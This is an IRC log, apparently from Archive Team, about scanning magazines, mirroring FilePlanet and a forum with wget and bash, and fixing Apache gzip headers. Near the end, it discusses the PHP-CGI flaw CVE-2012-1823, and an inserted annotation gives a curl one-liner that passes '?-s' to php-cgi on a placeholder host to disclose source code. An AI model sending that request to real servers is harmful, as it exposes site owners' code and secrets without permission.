01:23 <DFJustin> http://consumerist.com/2012/05/rock-band-for-iphone-game-will-self-destruct-in-29-days.html
01:30 <BlueMax> let's archive it! and break a million laws in the process!
01:33 <underscor> http://i.imgur.com/IP8pI.jpg
01:46 <dashcloud> actually- no it won't: http://www.theverge.com/gaming/2012/5/2/2995299/ea-rock-band-ios
02:48 <chronomex> yaay laws
02:49 <SketchCow> Nemo_bis: There are gaps in some of these runs of magazines - that's known, right
03:05 <SketchCow> AWWWWWWW shit
03:05 <SketchCow> I got the scanner running.
03:49 <SketchCow> http://archive.org/details/gamesmachine-034
06:06 <Nemo_bis> SketchCow, what gaps? I sent you a list of all the stuff I was shipping you, with numbers included; that's all I know
06:10 <Nemo_bis> hm or maybe I didn't
06:11 <Nemo_bis> the main part of it was
06:11 <Nemo_bis> *Pc Action: 93 magazines, 46 floppy disks, 55 CD-ROMs/DVDs (1-7, 9-94)
06:11 <Nemo_bis> *Pc World: 160 CD-ROMs/DVDs, 3 booklets (1996-2010)
06:11 <Nemo_bis> *The Games Machine: 94 magazines (87-180), 197 CD-ROMs/DVDs
06:11 <Nemo_bis> Content: 187 magazines, 412 CD-ROMs/DVDs, 106 floppy disks, 6 books
06:12 <Nemo_bis> I don't remember what I checked and I added some more stuff later.
06:32 <SketchCow> No worries
06:32 <SketchCow> I just wanted to make sure that when I was digitizing shizzle and then I was missing here and there, I wasn't, you know, losing stuff.
06:46 <SketchCow> http://archive.org/details/gamesmachine-034
06:46 <SketchCow> Tah dah!!!
06:52 <Nemo_bis> :D
06:52 <Nemo_bis> The file listing is empty
06:53 <SketchCow> Yeah, the new machine isn't loving ISO life.
06:53 <SketchCow> Anyway, minor setback.
06:56 <Nemo_bis> Internet Explorer 4.0
09:46 <SmileyG> err
09:46 <SmileyG> how long ago was the "migrate videos from Google video to youtube" thing?
09:50 <SmileyG> as I *just* got notification of it and switched mine.
11:23 <underscor> SmileyG: Looong time
11:23 <underscor> Over 6 months ago
11:23 <underscor> probably like 9
11:25 <SmileyG> heh weird.
11:25 <SmileyG> tho my videos were uploaded....
11:25 * SmileyG can't remember the date now, nov 2009 I think...
13:42 <Schbirid> i need wget help. i would like to mirror http://forum.jamendo.com/ but exclude any URLs that contain /comment/ /profile/ or /entry/
13:42 <Schbirid> those are NOT directories, but arguments to index.php, eg http://forum.jamendo.com/index.php?p=/profile/331639/509
13:44 <aggro> I thought the "--reject" argument took care of that. Can use it to get rid of links that have things like "&action=print," and aren't really different content.
13:45 <Schbirid> i thought that would only look at the extension (as in the end of the url string)
13:45 <Schbirid> i totally asked this before i think
13:45 <aggro> I can test it right quick. Thought it could match patterns as well.
13:45 <Schbirid> yeah
13:45 <Schbirid> Note that if any of the wildcard characters, *, ?, [ or ], appear in an element of acclist or rejlist, it will be treated as a pattern, rather than a suffix.
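A sketch of the invocation under discussion, assuming wget treats wildcard -R entries as patterns matched against the whole saved file name, query string included (hypothetical command; as the next messages show, it didn't pan out on the first try):

    # mirror the forum, skipping the /comment/, /profile/ and /entry/ views of index.php
    wget --mirror --reject '*comment*,*profile*,*entry*' http://forum.jamendo.com/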
13:45 <Schbirid> sweet
13:54 <Schbirid> can't figure it out. will resume later
16:06 <Schbirid> fileplanet is shutting down
16:07 <Schbirid> http://www.fileplanet.com/
16:07 <Schbirid> "Note: FilePlanet is no longer being updated and is in the process of being archived."
16:07 <Schbirid> ha ha ha
16:07 <Schbirid> fuck
16:07 <mistym> "archived"
16:07 <Schbirid> fuckfuckfuck
16:07 <Schbirid> it's IGN
16:07 <Schbirid> should be fairly easy to grab, you can wget urls you get from the site without cookies
16:09 <Schbirid> iirc even the timestamps are correct
16:09 <Schbirid> the terrible thing is that many files are from the old hosted planet* sites and probably not listed on the fileplanet pages
16:09 <mistym> fileplanet isn't the one that requires an obnoxious downloader and enforces browser user-agent strings, is it?
16:10 * shaqfu tries
16:11 <shaqfu> No, seems to work fine
16:11 <Schbirid> i am logged in, so it might be different, but example:
16:11 <Schbirid> http://www.fileplanet.com/224345/220000/fileinfo/Elder-Scrolls-V:-Skyrim---Macho-Dragons-v1.0
16:11 <Schbirid> click download
16:11 <Schbirid> you get http://www.fileplanet.com/224345/download/Elder-Scrolls-V:-Skyrim---Macho-Dragons-v1.0
16:11 <Schbirid> <a id="default-file-download-link" href="javascript:void();" onclick="window.location='http://m3x12.fileplanet.com/^542977820/ftp1/012012/Macho_Dragons_1_0.zip'">Click here</a>
16:11 <Schbirid> you can wget that just fine
16:12 <shaqfu> Phew
16:12 <shaqfu> Now I'm curious how far back their downloads go, given how old the site is
16:12 <Schbirid> they have a "Customer Support Fax"
16:12 <Schbirid> shaqfu: 1996 at least
16:12 <shaqfu> Yeah, I saw Half-Life 1 patches
16:12 <Schbirid> it started with planetquake and they migrated its downloads to fileplanet afaik
16:13 <mistym> Yeah, they're def. p. oldskool. I don't think they ever pruned stuff.
16:14 <mistym> "Customer Support Fax", wow.
16:14 <Schbirid> http://www.fileplanet.com/174/0/section/Gaming looks like a good starting point
16:15 <shaqfu> We should ask for a fax of their game demos...
16:15 <Schbirid> hm, 1999 for the oldest quake dm map
16:15 <mistym> Get a screenshot faxed back
16:15 <SketchCow> Adrian Chen - Gawker
16:15 <mistym> http://achewood.com/index.php?date=11222006
16:15 <Schbirid> thanks for keeping this place gawker free
16:16 <shaqfu> Trying to get an interview?
16:16 <shaqfu> Or just hoping something interesting happens to write up a clickmagnet headline?
16:17 <SketchCow> I assume same.
16:19 <SketchCow> I also assume he'll do the Sekrit Maneuver of coming back in here under an "assumed name".
16:20 <Schbirid> heh, wget -m --spider http://www.fileplanet.com/
16:20 <Schbirid> http://www.fileplanet.com/index.html works
16:21 <yipdw> "Jason Scott Bans Me From #archiveteam, Potentially Involved With Chickens"
16:21 <yipdw> or at least that's the caliber of writing Gawker seems to trade in
16:22 <ersi> lol!
16:22 <Schbirid> FPOps@IGN.com seems like a high contact
16:22 <SketchCow> Hey, some of you might know this.
16:22 <SketchCow> So, jsmess.textfiles.com no longer shows the javascript
16:22 <SketchCow> I know the big change - new apache server.
16:23 <SketchCow> But what's the setting to get it back?
16:23 <ersi> Do you get a 'download this javascript' file instead of the javascript?
16:24 <ersi> Or nothingness?
16:25 <SketchCow> Nothingness. Check it out.
16:25 <yipdw> SketchCow: it looks like the Content-Encoding header on the javascript is missing
16:25 <SketchCow> I am SURE it's a handler I don't have enabled.
16:25 <SketchCow> OK, where would I enable that in apache2.2
16:25 <SketchCow> I went from 1.3 something to 2.2 something so it was a fairly nasty jump.
16:25 <yipdw> in an appropriate configuration file (httpd.conf, virtualhost config, etc):
16:25 <yipdw> <FilesMatch "\.js\.gz$">
16:25 <yipdw> Header set Content-Encoding gzip
16:25 <yipdw> Header set Content-Type "text/javascript; charset=utf-8"
16:25 <yipdw> </FilesMatch>
16:27 <yipdw> I *think* that'll work
16:27 <yipdw> SketchCow: you can set that in a <VirtualHost> or <Directory> context, so scope to whichever one is most specific, etc
16:28 <yipdw> oh, fuck, I forgot that that needs mod_headers loaded
16:30 <yipdw> well, maybe it's already loaded, we'll see
16:30 <yipdw> "You have already activated rake 0.9.2.2, but your Gemfile requires rake 0.9.2. Using bundle exec may solve this."
16:31 <yipdw> motherfucking christ I hate Ruby environments sometimes
16:31 <SketchCow> yipdw: Did it, no load
16:31 <SketchCow> LoadModule headers_module libexec/apache22/mod_headers.so
16:31 <yipdw> hmm
16:32 <SketchCow> it's definitely loading it.
16:32 <yipdw> hmm, ok
16:33 <yipdw> well, let's pull that FilesMatch thing out then
16:33 <SketchCow> I enabled compress
16:33 <SketchCow> already pulled
16:33 <yipdw> ok
16:33 <SketchCow> Still not working, but enabled compress.
16:33 <yipdw> the error Chrome is throwing is "Uncaught SyntaxError: Unexpected token ILLEGAL", so it's interpreting the gzipped javascript without decompressing it
16:34 <yipdw> I'm trying to figure out what combination of headers it needs to go "oh, this is gzipped"
16:34 <Schbirid> yay, we can go with http://www.fileplanet.com/NUMERICID/download/
16:35 <yipdw> I thought Content-Encoding was it, and it probably is
16:35 <Schbirid> pretty slow though
16:35 <yipdw> but there's probably something else wrong in there
16:35 <yipdw> one sec
16:36 <devesine> it is both content-encoding and content-type
16:36 <yipdw> devesine: yeah, but I'm not sure what was wrong with either
16:36 <devesine> <FilesMatch .*\.js\.gz$>
16:36 <devesine> </FilesMatch>
16:36 <devesine> ForceType text/javascript
16:36 <devesine> Header set Content-Encoding: gzip
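Assembled in the intended order, devesine's suggestion would presumably read as follows (it needs mod_headers, as came up above; note that Header set takes the header name without a trailing colon):

    <FilesMatch "\.js\.gz$">
        ForceType text/javascript
        Header set Content-Encoding gzip
    </FilesMatch>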
16:36 <yipdw> what does ForceType do that Header set Content-Type doesn't?
16:36 <devesine> heck if i know
16:36 <yipdw> uhh
16:37 <Schbirid> yeah, nice. the /download/ HTML includes both the direct download link AND the location of the file, eg "Home / Gaming / RPG / Massively Multiplayer / Gas Guzzlers: Combat Carnage / Game Clients"
16:37 <devesine> looks like it causes all internal apache bits to treat it as that type
16:37 <yipdw> wtf
16:37 <devesine> though i don't know what aside from the content-type header cares
16:37 <yipdw> wtf apache
16:37 <yipdw> well, ok
16:38 <yipdw> I guess that can be tried
16:38 <yipdw> I'm not sure why the default MIME type detection would screw it up
16:39 <Schbirid> mail to ign sent
16:39 <devesine> possibly the mime type Content-Type header gets set late in the process?
16:39 <yipdw> devesine: I dunno -> https://gist.github.com/14cb242afb08c4c6714a
16:39 <devesine> (it's been a blissfully long time since i had to know details about apache internals that fine-grained - these days i'm all about nginx)
16:39 <yipdw> that's what I got with the previous FilesMatch in place, which I thought would work
16:39 <yipdw> but evidently it didn't
16:40 <yipdw> and I'm not sure why
16:40 <devesine> huh, that looks reasonable to me
16:40 <yipdw> yeah, me too
16:40 <yipdw> unless the charset thing is screwing it up
16:41 <Schbirid> http://www.fileplanet.com/024884/download/ is the same as http://www.fileplanet.com/24884/download/ and they both work
16:41 <yipdw> where by "it" I mean Chrome
16:42 <devesine> https://gist.github.com/14cb242afb08c4c6714a#gistcomment-298537 is my server's response
16:42 <yipdw> it looks like Apache is doing the right things there, unless it's mangling the response body
16:42 <devesine> yeah, i'm using chrome too
16:42 <yipdw> hm
16:42 <yipdw> i wonder what happens with no charset set
16:43 <devesine> huh, i'm getting Content-Encoding: x-gzip back from jsmess.textfiles.com
16:43 <devesine> (in curl)
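A quick way to reproduce that check from a shell (the asset name is a placeholder; any of the site's gzipped .js files would do):

    curl -sI http://jsmess.textfiles.com/example.js.gz | grep -i '^content-'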
16:44 <yipdw> the configuration might have changed
16:47 <devesine> chrome thinks the headers I got back include
16:47 <devesine> Content-Type: application/x-gzip
16:47 <Schbirid> fuckers return 302 for non-existing links...
16:50 <Schbirid> gah. can i not tell wget not to follow a 302 to a directory?
16:50 <Schbirid> "wget -X error http://www.fileplanet.com/1/download/" still downloads "http://www.fileplanet.com/error/error.shtml?aspxerrorpath=/autodownload.aspx"
16:50 <devesine> hm, chrome wasn't believing that the cache was cleared, it looks like
16:51 <devesine> clearing the cache, quitting chrome, starting it up again, clearing the cache, quitting chrome, starting it up again, and /then/ going to jsmess.textfiles.com loaded it fine
16:53 <Schbirid> http://blog.jamendo.com/2012/05/03/response-to-the-community/
17:03 <Schbirid> i wonder how soon fileplanet links expire
17:12 <Schbirid> so, we need to download http://www.fileplanet.com/NUMERICID/download/, grep that file for the dl link, and download the file (to the same dir i guess, sorting can happen later)
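A minimal sketch of that per-ID step (hypothetical helper; the actual script linked further down adds ranges and logging). It pulls the direct link out of the onclick attribute shown earlier:

    #!/bin/bash
    # usage: ./grab.sh NUMERICID
    id=$1
    dir="www.fileplanet.com/$id/download"
    # -x recreates the host/path layout, so the page lands in $dir/index.html
    wget -q -x "http://www.fileplanet.com/$id/download/"
    # the real mirror URL hides in: onclick="window.location='http://...zip'"
    url=$(grep -o "window.location='[^']*'" "$dir/index.html" | head -n 1 | cut -d "'" -f 2)
    # fetch the file only when a direct link was actually present
    [ -n "$url" ] && wget -q -P "$dir" "$url"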
17:12 <Schbirid> i love bash
17:14 <Schbirid> and jedit
17:16 <Schbirid> hm, the actual download links are interesting too. eg /ftp1/fpnew/action/quake/levels/dm/armory2.zip
17:17 <Schbirid> not sure if i should rather save the files under that path or in www.fileplanet.com/NUMERICID/download/
17:17 <Schbirid> thoughts?
17:19 <Schbirid> nah
17:19 <Schbirid> the url is saved so if needed one could do that later
17:21 <Schbirid> script is ready \o/
17:22 <Schbirid> hm, any suggestion how i can make a loop like: for i in {$1..$2}?
17:22 <Schbirid> i would like to pass the starting and last id to download from the commandline
17:22 <Schbirid> doing this i get "{1466..1470}"
17:22 <Schbirid> for $i itself
17:23 <Schbirid> "for i in $(seq $1 $2)" seems to work
17:24 <bayleef`> maybe for i in {$1..$2}?
17:24 <Schbirid> nope, that was my first try
17:25 <bayleef`> Ah
17:25 <Schbirid> this works great, yay
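For the record, {$1..$2} fails because bash performs brace expansion before parameter expansion, so the braces only ever see the literal strings $1 and $2. seq sidesteps that; an arithmetic for-loop would too:

    # seq-based, as settled on above
    for i in $(seq "$1" "$2"); do echo "$i"; done

    # C-style arithmetic loop, no external command needed
    for (( i = $1; i <= $2; i++ )); do echo "$i"; done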
17:25 * bayleef` grins
17:34 <SketchCow> http://jsmess.textfiles.com/ is back. Thanks for the help, everyone.
17:34 <SketchCow> As a bonus - some keys work!
17:36 <Schbirid> https://github.com/SpiritQuaddicted/fileplanet-file-download/blob/master/download_pages_and_files_from_fileplanet.sh
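Presumed usage, given the start and end IDs the script takes on the command line (the range here is illustrative):

    ./download_pages_and_files_from_fileplanet.sh 16001 17000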
17:36 <Schbirid> we'll need to assign ranges. starting from 1 and ending somewhere in 200k
17:36 <Schbirid> it takes about one second for non-existing IDs so far
17:39 <Schbirid> the downloads must be big
17:39 <Schbirid> i'll start with 1-2000 just to see what happens
17:40 <shaqfu> Looks good
17:40 <shaqfu> Is it roughly chronological in terms of file ID?
17:40 <Schbirid> yeah, i think very much so
17:43 <shaqfu> Gotcha. Should go quicker early, then
17:46 <shaqfu> If it does its job, let me know and I'll run it
17:47 <Schbirid> sweet :)
17:49 <Schbirid> ahaha http://www.kb.cert.org/vuls/id/520827
17:49 <shaqfu> I'll give it a shot now, actually, on 2001-4000
17:50 <Schbirid> thanks
17:54 <Schbirid> http://jsdosbox.appspot.com
17:54 <Schbirid> <15 minutes per 1k so far
17:55 <Schbirid> but only single digits of actual found files ;)
17:55 <Schbirid> and i am enough of a quake fanatic to know all of them
17:56 <Schbirid> i'll go 4001-10000
17:57 <shaqfu> Sigh; I really need to get a real OS on this server, and not one with a flaky wget that doesn't have --max-redirect
17:59 <Schbirid> haha
17:59 <shaqfu> Got it this time; doing 10k-15k
18:00 <Schbirid> yay
18:01 <shaqfu> Seems to be moving a bit slower for me, although those are probably much larger files than Quake maps
18:01 <Schbirid> might also be just fileplanet sucking
18:01 <shaqfu> That too
18:03 <Schbirid> earlier i sometimes had 5-10 seconds per html page download
18:04 <Schbirid> hm, i have a bug
18:05 <shaqfu> ?
18:05 <shaqfu> And it looks like there are ~220k fileIDs...
18:05 <Schbirid> ah, haha. i try to download even if there is no link. so files_$1_$2.log gets a lot of "http://: Invalid host name."
18:05 <Schbirid> i should make that nicer really
18:05 <Schbirid> scared me for a moment
18:06 <shaqfu> Ah, phew; nothing critical then
18:25 <DFJustin> holy hell this jsdosbox
18:32 <SketchCow> Feel inspired.
18:36 <Schbirid> doing fileplanet 15k-16k
18:36 <shaqfu> Are there any IGN network sites at-risk like this?
18:37 <shaqfu> any other*
18:38 <Schbirid> i'd consider them all at risk :(
18:38 <Schbirid> interesting, the new planet* files are not served from fileplanet anymore, i never noticed
18:39 <Schbirid> eg http://planetquake.gamespy.com/View.php?view=Quake4.Detail&id=157
18:39 <shaqfu> I don't see the warnings on planetquake; guess it's not at immediate risk
18:39 <Schbirid> haha, no way. they seem to have dropped forumplanet without any notice
18:40 <Schbirid> wtf
18:40 <Schbirid> jesus
18:40 <Schbirid> and i mirrored it by pure random intent
19:01 <shaqfu> Ouch
19:47 <Schbirid> hm, the forums might just have been moved. eg http://www.ign.com/boards/forums/diablo.5218/ exists
19:47 <Schbirid> 15k-16k took 70 minutes
19:48 <Schbirid> ~300 mb
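A rough back-of-envelope on those figures, assuming the 70-minutes-per-1k rate held across all ~220k IDs, which is presumably why the ranges get split among several people:

    # one worker: 220 blocks of 1,000 IDs at ~70 minutes each
    echo $(( 220 * 70 / 60 / 24 ))   # => 10 (days, roughly)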
19:48 <Schbirid> bedtime for me. anything above 16k is free
21:33 <Schbirid> night
21:33 <closure> http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ I'll bet this is how the old wiki kept getting hacked
21:36 <closure> (current one does not seem vulnerable)
21:37 <Ymgve> does your old wiki use php-cgi?
21:37 <closure> according to the page, it was a common configuration on dreamhost
21:37 <mistym> Oh PHP.
21:41 <Ymgve> oh
21:41 <shaqfu> Oh Dreamhost
21:49 <mistym> That too...
22:03 <shaqfu> Well, today's foray into scripting taught me something: line breaks suck
22:03 <yipdw> "We found that giving the query string “?-s” somehow resulted in the “-s” command line argument being passed to php, resulting in source code disclosure."
22:03 <yipdw> what the fuck
22:05 <chronomex> not "somehow", some guy removed protection against that in like 2004 because it made unit testing more complicated
22:05 <yipdw> unit testing of what
22:05 <yipdw> I guess I should look at the commit history
22:06 <chronomex> probably unit testing that didn't exist
22:06 <yipdw> because the fact that an application query string can affect the command line seems ridiculous on its face
22:06 <chronomex> the query string is commandlineified
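An illustration of the mechanism being described, i.e. CVE-2012-1823 (hypothetical target; don't point this at servers you don't own):

    # a query string containing no '=' is handed to php-cgi as an argv entry,
    # so '?-s' effectively runs 'php-cgi -s' and echoes the script's source
    curl 'http://vulnerable.example/index.php?-s'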
22:07 <chronomex> I probably sound like I'm making excuses, don't I?
22:07 <yipdw> oh
22:07 <chronomex> fuck those guys. they couldn't program themselves out of a paper bag.
22:07 <yipdw> "From the regression testing system we use -d extensively to override ini settings to make sure our test environment is sane."
22:07 <yipdw> that's still a what the fuck
22:07 <yipdw> why not just put in a "sane" ini file as a precondition
22:46 <chronomex> too complicated
22:46 <ersi> yipdw: Testing is hard.